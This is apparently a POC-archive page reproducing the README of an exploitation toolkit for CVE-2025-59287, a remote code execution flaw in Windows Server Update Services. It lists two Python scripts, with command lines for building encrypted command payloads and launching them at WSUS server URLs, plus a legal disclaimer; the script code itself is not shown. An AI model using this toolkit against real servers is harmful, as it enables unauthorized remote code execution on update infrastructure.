关联漏洞
介绍
CVE-2025-59287 - WSUS Exploitation Toolkit
by adel-h4x0a
⚠️ For Educational and Authorized Testing Purposes Only ⚠️
Overview
This toolkit demonstrates the exploitation of CVE-2025-59287, a remote code execution vulnerability in Windows Server Update Services (WSUS).
Components
1. Encryption Module (cve-2025-59287-encr.py)
· AES payload encryption for WSUS communication
· Support for both legacy and secure encryption modes
· Custom payload generation
2. Exploitation Module (cve-2025-59287-exp.py)
· Full exploitation chain for CVE-2025-59287
· Robust error handling and retry logic
· Custom payload support
Structure
```
📁 CVE-2025-59287-WSUS-Exploit/
├── 📄 cve-2025-59287-encr.py # Encryption module
├── 📄 cve-2025-59287-exp.py # Exploitation module
├── 📄 requirements.txt # Dependencies
└── 📄 README.md # This file
```
Usage
Prerequisites
```bash
pip install -r requirements.txt
```
Encryption
```bash
# Basic encryption
python cve-2025-59287-encr.py --command "calc" --mode legacy
# Encryption with custom key
python cve-2025-59287-encr.py --key "877C14E433638145AD21BD0C17393071" --command "whoami"
# Save output to file
python cve-2025-59287-encr.py --command "ipconfig" --output payload.txt
```
Exploitation
```bash
# Basic exploitation
python cve-2025-59287-exp.py http://wsus-server:8530
# With custom payload
python cve-2025-59287-exp.py http://192.168.1.100:8530 --payload custom_payload.txt
# With advanced settings
python cve-2025-59287-exp.py http://wsus-server:8530 --timeout 60 --retries 5
```
Options
Encryption Module (cve-2025-59287-encr.py)
· --key: AES key in hex format (optional)
· --command: Command to execute (default: calc)
· --mode: Encryption mode [`legacy`, `secure`] (default: legacy)
· --output: Output file to save payload (optional)
Exploitation Module (cve-2025-59287-exp.py)
· target: WSUS server URL (required)
· --payload: Custom base64 payload file (optional)
· --timeout: Request timeout in seconds (default: 30)
· --retries: Number of retry attempts (default: 3)
· --no-banner: Suppress banner display (optional)
Complete Example
```bash
# Generate custom payload
python cve-2025-59287-encr.py --command "whoami /all" --output custom_payload.txt
# Execute exploitation
python cve-2025-59287-exp.py http://wsus.internal.com:8530 --payload custom_payload.txt
```
Legal Disclaimer
❗ Important Warning:
This tool is provided for educational purposes and authorized penetration testing only. Unauthorized use against systems you do not own or have explicit permission to test is illegal.
This tool should only be used in:
· Testing environments that you own
· Systems for which you have obtained written permission to test
· Educational and academic purposes
The developer is not responsible for any illegal or unauthorized use of this tool.
License
This project is licensed under the MIT License.
Updates
· v1.0: Initial release with full exploitation support
· v1.1: Enhanced error handling and logging improvements
Contributing
Bug reports and pull requests are encouraged to improve the tool within the framework of responsible and ethical usage.
---
Note: Always obtain written permission before testing any system. Security awareness begins with responsibility. 🔒
文件快照
[4.0K] /data/pocs/9718854828323819c7f1063a33e71357f90ca66f
├── [8.6K] cve-2025-59287-encr.py
├── [ 18K] cve-2025-59287-exp.py
├── [3.3K] README.md
└── [ 53] requirements.txt
1 directory, 4 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。